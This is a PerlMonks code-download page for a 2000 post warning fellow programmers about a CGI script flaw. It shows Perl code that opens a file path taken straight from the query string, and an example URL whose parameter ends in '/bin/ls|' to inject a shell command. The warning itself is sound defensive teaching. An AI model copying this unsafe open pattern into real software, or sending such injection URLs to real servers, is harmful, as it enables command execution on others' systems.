Beefy Boxes and Bandwidth Generously Provided by pair Networks
Perl: the Markov chain saw
 
PerlMonks  

Warning our Fellow Monks

by Ovid (Cardinal)
on Oct 11, 2000 at 00:24 UTC ( [id://36121]=monkdiscuss: print w/replies, xml ) Need Help??

Help for this page

Select Code to Download


  1. or download this
    open(IN, "$filepath/$siteinfo[1]");
    
  2. or download this
    $query_string = $ENV{'QUERY_STRING'};
    @search      = split(/&/,$query_string);
    @info      = split(/=/, $search[0]);
    @siteinfo      = split(/-/, $info[1]);
    
  3. or download this
    http://www.somehost.com/path/to/script/badscript.cgi?name=x-/bin/ls|
    

Log In?
Username:
Password:

What's my password?
Create A New User
Domain Nodelet?
Node Status?
node history
Node Type: monkdiscuss [id://36121]
Approved by root
help
Chatterbox?
and the web crawler heard nothing...

How do I use this?Last hourOther CB clients
Other Users?
Others browsing the Monastery: (6)
As of 2024-04-23 21:06 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?

    No recent polls found